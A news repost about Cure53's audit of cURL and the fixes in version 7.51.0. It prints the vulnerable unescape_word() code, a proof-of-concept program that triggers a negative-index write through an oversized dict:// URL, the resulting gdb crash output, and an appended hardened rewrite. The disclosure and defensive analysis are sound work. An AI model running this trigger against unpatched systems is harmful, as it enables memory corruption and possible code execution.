myhack58 | 佚名 (Anonymous) | MYHACK58:62201681821
Dec 06, 2016 - 12:00 a.m.

Note: cURL has quite a few vulnerabilities too - Vulnerability alert - myhack58 (黑吧安全网)

Author: 佚名 (Anonymous)
Source: www.myhack58.com

CVSS3: 9.8 High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS2: 7.5 High
AV:N/AC:L/Au:N/C:P/I:P/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

EPSS: 0.014 Low
Percentile: 85.0%

Security experts have audited cURL and found a number of security issues; the latest version fixes them.
cURL needs no introduction: it is an open source command-line tool and library for transferring data over a variety of protocols. It is now used very widely, in network devices, printers, smartphones, and even Internet of Things devices such as cars.
A proactive audit
Not long ago, cURL's lead developer, Mozilla employee Daniel Stenberg, asked Mozilla's Secure Open Source (SOS) project to commission a security audit of cURL.
“The Mozilla Secure Open Source project had a security audit done for me. The project is funded by Mozilla, which finds a third-party company to take part and ultimately pays for it. The company involved in the audit is called Cure53,” Stenberg writes in his blog. “The reason I applied for the audit is that recently I have felt there were some security-related problems; I thought we might be lacking on the security side, so I wanted to let the experts check it.”
Five Cure53 experts audited cURL over a period of 20 days and found a total of 23 security issues.
Audit results
Of these issues, 9 were security vulnerabilities. The experts merged two of them into one, and one was reclassified as a “plain bug” because exploiting it in a practical attack scenario would be very difficult. In addition, the audit found 4 high-severity and 4 medium-severity vulnerabilities.
The high-severity vulnerabilities are CVE-2016-8617, CVE-2016-8619, CVE-2016-8622 and CVE-2016-8623. All of them are memory-safety bugs that could lead to remote code execution.
One example:
CRL-01-014: Integer overflow in unescape_word() leads to a negative array index (High)
The unescape_word() function in dict.c contains the following code:
```c
static char *unescape_word(struct Curl_easy *data, const char *inputbuff)
{
  char *newp;
  char *dictp;
  char *ptr;
  int len;
  char ch;
  int olen=0;   /* output index kept in a signed int: this is the bug */

  newp = curl_easy_unescape(data, inputbuff, 0, &len);
  if(!newp)
    return NULL;

  /* the allocation is computed in size_t, so it succeeds even when the
     escaped output is larger than INT_MAX bytes */
  dictp = malloc(((size_t)len)*2 + 1); /* add one for terminating zero */
  if(dictp) {
    /* According to RFC2229 section 2.2, these letters need to be escaped with
       \[letter] */
    for(ptr = newp;
        (ch = *ptr) != 0;
        ptr++) {
      if((ch <= 32) || (ch == 127) ||
          (ch == '\'') || (ch == '\"') || (ch == '\\')) {
        dictp[olen++] = '\\';   /* olen can be incremented past INT_MAX here */
      }
      dictp[olen++] = ch;
    }
    dictp[olen]=0;
  }
  free(newp);
  return dictp;
}
```
len is an int, so it is smaller than pow(2,31), but every input byte may be expanded to two output bytes, so the output can grow to twice that size. In other words, olen is incremented past INT_MAX, which is a signed integer overflow.
Since olen is used as the array index, the index becomes negative and the write lands far outside the allocated buffer, in memory that is not mapped.
To verify the vulnerability, run the following code on a 64-bit machine with 6 GB or more of free memory. The test fetches a dict:// URL that is more than 1 GB long.
```c
#include <curl/curl.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    /* 1 GiB of '"' characters: each one is escaped to two bytes, so olen
       reaches 2^31 and wraps. The shift amount follows from the "more than
       1 GB" URL described above and the 0x80000000 offset in the crash. */
    char *dicturl = malloc(23 + (1ULL << 30) + 1);
    if (!dicturl)
        errx(1, "malloc");
    strcpy(dicturl, "dict://localhost/MATCH:");   /* 23-byte prefix */
    memset(dicturl + 23, '"', (1ULL << 30));
    dicturl[23 + (1ULL << 30)] = 0;

    CURL *hnd = curl_easy_init();
    curl_easy_setopt(hnd, CURLOPT_URL, dicturl);
    free(dicturl);   /* libcurl keeps its own copy of the URL */
    curl_easy_setopt(hnd, CURLOPT_NOPROGRESS, 1L);
    CURLcode ret = curl_easy_perform(hnd);
    curl_easy_cleanup(hnd);
    return (int)ret;
}
```
Running it produces the following crash. Note that the faulting address in $rax is exactly 0x80000000 bytes (2^31) below dictp, i.e. the store targeted dictp[-2147483648], and olen has already been post-incremented to -2147483647 by the time gdb prints it:
```
$ gdb ./negative_dict_url
(gdb) run
Starting program: [...]
[...]
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b6975b in unescape_word (data=0x63a0b0, inputbuff=0x7fffb0fca017 '"' ...) at dict.c:116
116         dictp[olen++] = '\\';
(gdb) x/1i $pc
=> 0x7ffff7b6975b <unescape_word+170>:  mov
(gdb) print/x $rax
$1 = 0x7ffdf0dba010
(gdb) print/x dictp
$2 = 0x7ffe70dba010
(gdb) print olen
$3 = -2147483647
```
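As an added example (not code from the article or from the curl project), the following shows the escaping loop above rewritten so that the overflow cannot occur, next to a helper that answers, without allocating anything, whether an input of a given length would push the original int index past INT_MAX. The function names, the choice to take the decoded word and its explicit length instead of calling curl_easy_unescape(), and the use of unsigned char for the comparison are my own assumptions; the sample input in main() is constructed.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper, not curl code: would an already-decoded word of
   'inlen' bytes drive the original 'int olen' past INT_MAX?  In the worst
   case every byte is escaped, so olen reaches 2*inlen before the
   terminator is written; it is incremented past INT_MAX exactly when
   2*inlen > INT_MAX.  No memory is touched, so this is cheap to evaluate
   for the 1 GiB input used in the PoC. */
int dict_escape_overflows_int(size_t inlen)
{
    return inlen > (size_t)INT_MAX / 2;
}

/* Hypothetical hardened escaper (an assumed rewrite, not curl's own fix).
   It takes the decoded word with an explicit length, keeps the output index
   in size_t, and refuses inputs whose escaped size 2*inlen + 1 would not
   fit in size_t.  Bytes >= 0x80 are passed through unescaped because the
   comparison is done on an unsigned value; the original's signed 'char ch'
   made them compare <= 32 on platforms where char is signed (x86). */
char *dict_escape_word(const char *word, size_t inlen)
{
    if (word == NULL)
        return NULL;
    if (inlen > (SIZE_MAX - 1) / 2)   /* 2*inlen + 1 would wrap */
        return NULL;

    char *out = malloc(inlen * 2 + 1);
    if (out == NULL)
        return NULL;

    size_t olen = 0;
    for (size_t i = 0; i < inlen; i++) {
        unsigned char ch = (unsigned char)word[i];
        /* RFC 2229 section 2.2: control characters, space, DEL, quotes and
           backslash are written as backslash followed by the character */
        if (ch <= 32 || ch == 127 || ch == '\'' || ch == '"' || ch == '\\')
            out[olen++] = '\\';
        out[olen++] = (char)ch;
    }
    out[olen] = '\0';
    return out;
}

int main(void)
{
    /* Constructed sample input, not taken from the page. */
    const char sample[] = "a\"b\\c d";
    char *escaped = dict_escape_word(sample, sizeof(sample) - 1);
    if (escaped == NULL) {
        fprintf(stderr, "escape failed\n");
        return 1;
    }
    printf("%s -> %s\n", sample, escaped);
    free(escaped);

    /* The PoC's 1 GiB of '"' characters versus the largest safe length. */
    printf("1<<30 bytes overflow the int index: %d\n",
           dict_escape_overflows_int((size_t)1 << 30));
    printf("INT_MAX/2 bytes overflow the int index: %d\n",
           dict_escape_overflows_int((size_t)INT_MAX / 2));
    return 0;
}
```

The boundary is exact: with INT_MAX/2 input bytes the original index reaches 2147483646 and never passes INT_MAX, while one more byte pushes 2*inlen to 2^31 and the int wraps to INT_MIN, which is the dictp[-2147483648] store seen in the gdb session.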
That said, the audit report noted that the overall security and robustness of the cURL library are very good.
There is no need to worry, either: the new version of cURL is already out. Version 7.51.0 fixes a total of 11 vulnerabilities, 7 of them found by the Cure53 audit team and the rest reported by Luật Nguyễn, Christian Heimes and Fernando Muñoz.
Stenberg pointed out that cURL is extremely widely used, so the audit is of great significance to users.
“Since curl is the world's most commonly used software, a problem in curl could have a significant impact on a variety of tools, devices and applications. We don't want that kind of thing.”
